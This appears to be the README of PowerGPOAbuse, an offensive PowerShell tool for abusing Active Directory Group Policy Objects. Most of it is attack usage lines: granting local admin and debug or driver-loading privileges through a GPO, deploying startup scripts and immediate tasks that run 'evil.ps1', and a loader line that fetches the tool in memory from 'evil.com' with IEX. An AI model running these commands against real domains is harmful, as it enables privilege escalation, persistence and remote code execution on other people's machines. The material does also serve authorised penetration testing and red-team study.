PowerShell version of SharpGPOAbuse for those who can't compile it or whose C2 can't execute .NET assemblies directly from memory. Heavily inspired by the original C# version and the amazing PowerView.
-
PS> Import-Module .\PowerGPOAbuse.ps1
-
PS> . .\PowerGPOAbuse.ps1
-
PS> IEX (New-Object System.Net.WebClient).DownloadString('https://evil.com/PowerGPOAbuse.ps1')
-
These functions are designed to support the exploitation functions, but they can also be used for quick recon. They are not intended to replace PowerView's equivalents.
-
List users
PS> Get-DomainUser
-
List groups
PS> Get-DomainGroup
-
List GPOs
PS> Get-DomainGPO
-
List OUs
PS> Get-DomainOU
-
List DCs
PS> Find-DomainController
-
Changing GPO status
PS> Set-DomainGPOStatus -GPOIdentity "SuperSecureGPO" -Status "AllSettingsDisabled"
-
Creating a new GPLink
PS> New-DomainGPLink -GPOIdentity "SuperSecureGPO" -OUIdentity "SecureUsers" -Status "LinkEnabled"
-
Changing the status of a GPLink
PS> New-DomainGPLink -GPOIdentity "SuperSecureGPO" -OUIdentity "SecureUsers" -Status "LinkEnabled"
-
Adding a user to a group
PS> Add-GPOGroupMember -Member 'Bobby' -GPOIdentity 'SuperSecureGPO'
-
Assign a new right
PS> Add-GPOUserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
-
Adding a new Computer/User script
PS> Add-GPOStartupScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' -Scope Computer/User
-
Create a new Computer/User immediate task
PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User
-
Adding a new registry key
PS> Add-GPORegistryPreference -GPOIdentity SuperSecureGPO -RegistryPath "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -RegistryKey "__PSLockdownPolicy" -RegistryValue "4" -RegistryValueType String -RegistryAction Create
-
Create a new GPO
PS> New-DomainGPO -DisplayName SuperSecureGPO -Domain testlab.local
-
Delete a GPO
PS> Remove-DomainGPO -GPOIdentity SuperSecureGPO -RemoveFile
-
Add-LocalAdmin -> Add-GPOGroupMember
-
Add-UserRights -> Add-GPOUserRights
-
Add-Script -> Add-GPOStartupScript
-
Add-Task -> Add-GPOImmediateTask
-
Add-RegistryValue -> Add-GPORegistryPreference
Reverse functions, Backup Operator weaponization, stability, optimisation and new exploitation functions.
If you find any bugs, have ideas to improve the script, or have any feedback, feel free to raise an issue or propose a pull request!